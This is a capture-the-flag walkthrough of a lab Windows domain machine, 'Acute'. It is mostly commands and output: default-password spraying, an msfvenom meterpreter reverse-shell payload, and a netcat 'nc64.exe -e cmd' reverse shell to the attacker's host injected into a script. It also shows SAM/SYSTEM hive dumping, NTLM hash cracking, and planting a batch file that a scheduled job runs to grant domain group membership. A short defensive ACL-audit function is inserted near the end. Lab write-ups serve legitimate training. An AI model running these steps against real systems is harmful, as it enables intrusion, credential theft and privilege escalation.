
Acute

echo "10.129.232.128 acute.local atsserver.acute.local" >> /etc/hosts
python3 dirsearch.py -u https://atsserver.acute.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
There is a link that downloads a .docx document.
They are all inaccessible.
Record the name found in the document:
Lois
Default password:
Password1!
dc_manage
In the Description I see Acute-PC01, which implies there is a new PC. The creator name FCastle hints at the username format.
Record those names. Lois Hopkins stands out, since we found the name Lois in the previous document.
Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, Lois Hopkins
Found a page for Windows PowerShell Web Access.
Try all extracted names with the default password Password1! and the computer name Acute-PC01.
AWallace, WAileen, HCharlotte, CHall, EDavies, DEvan, IMonks, MIeuan, Joshua, Morgan, JMorgan, MJoshua, Lois, Hopkins, HLois, LHopkins, FCastle
Successfully logged in with the credentials EDavies:Password1!
I also found two other user folders: jmorgan and Natasha.
Continue enumeration by trying the default password on those two users.
Failed to log in with the default password Password1!
netstat -ano | findstr TCP
Look into port 5040, which I haven't seen before.
Try port forwarding with chisel:
./chisel server -p 12345 --reverse
./chisel.exe client 10.10.14.11:12345 R:5040:127.0.0.1:5040
Accessed it, but got no response.
Back to enumeration through PowerShell Web Access.
User jmorgan is in the Administrators group.
Improve our shell by uploading an msfvenom payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=6666 -f exe -o reverse.exe
It's blocked by Windows Defender.
After further enumeration I found a path from which the program executes without Defender blocking it.
Got the reverse shell.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
172.16.22.1 seems to be the host machine.
RDP session found.
screenshare
Capture the screen several times with screenshare; the captured screenshots show the session changing over time.
Retrieved a credential, acute\imonks:w3_4R3_th3_f0rce. (the trailing dot is part of the password).
Upload RunasCs.exe:
./RunasCs.exe acute\imonks w3_4R3_th3_f0rce. "./reverse.exe"
Did not work.
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Got the initial (user) flag.
Invoke-Command -ScriptBlock { Get-Command } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls 'C:\program files' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls 'C:\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
No permission to access it.
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Contents of wm.ps1:
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
 
net localgroup administrators
 
Invoke-Command -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.14.5 6666') | sc -Path C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Received the shell as jmorgan.
 
Retrieve the password:
As a local administrator on Acute-PC01, jmorgan can create backups of the registry hives.
reg save HKLM\sam sam.bak
reg save HKLM\system sys.bak
Copy them to C:\Utils, then download them through meterpreter.
secretsdump.py -sam sam.bak -system sys.bak LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
┌─[root@htb-uzwpqxuk1h]─[/home/b3bop404/Desktop]
└──╼ #cat hash | awk -F ':' '{print $4}'
a29f7623fd11550def0192de9246f46b
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
24571eab88ac0e2dcef127b8e9ad4740
29ab86c5c4d2aab957763e5c1720486d
hashcat -m 1000 ./h /usr/share/wordlists/rockyou.txt
Two cracked (-m 1000 selects the NTLM mode):
Administrator:Password@123
Guest: (empty password)
Try the existing user awallace with this password:
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
Try to list the keepmeon folder again (we had no permission before):
Invoke-Command -ScriptBlock { ls '\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
There is a .bat file:
Invoke-Command -ScriptBlock { type '\program files\keepmeon\keepmeon.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
  if not "%%x" == "%~0" call "%%x"
)
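The job above calls every .bat it finds under that folder, so the folder's ACL decides who can get code executed by the account running the job. As an added defensive check, not from the original writeup, here is a PowerShell function that reports every non-privileged principal with write access to such a directory and to the scripts in it; the path and the trusted-principal list are assumptions.

```powershell
# Added example (not from the original writeup): audit a directory that a scheduled
# job executes scripts from, and report each ACE that lets an untrusted principal write.
# Assumptions: run elevated on the host; $Path and $TrustedPrincipals are placeholders.
function Get-UntrustedWriteAccess {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Principals expected to write here; every other principal with write rights is reported.
        [string[]]$TrustedPrincipals = @(
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators',
            'NT SERVICE\TrustedInstaller'
        )
    )
    # Any of these rights lets a caller add or alter a .bat that the job will call.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                 [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                 [System.Security.AccessControl.FileSystemRights]::WriteData

    # Check the directory itself plus every script already inside it.
    $targets = @(Get-Item -LiteralPath $Path) +
               @(Get-ChildItem -LiteralPath $Path -Recurse -Include *.bat, *.ps1 -File)

    foreach ($item in $targets) {
        $acl = Get-Acl -LiteralPath $item.FullName
        foreach ($ace in $acl.Access) {
            # Deny ACEs are skipped; only Allow ACEs grant access.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Generic-rights ACEs (shown as large numbers) are not decoded here.
            if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                Path      = $item.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Placeholder path: the folder the batch job iterates over every five minutes.
Get-UntrustedWriteAccess -Path 'C:\Program Files\keepmeon' | Format-Table -AutoSize
```

Any row in the output is a principal that can get its own script run by the job's account; an empty result means only the trusted principals can write there.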
 
Invoke-Command -ScriptBlock { net group /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
 
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
 
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\users\administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Read root.txt.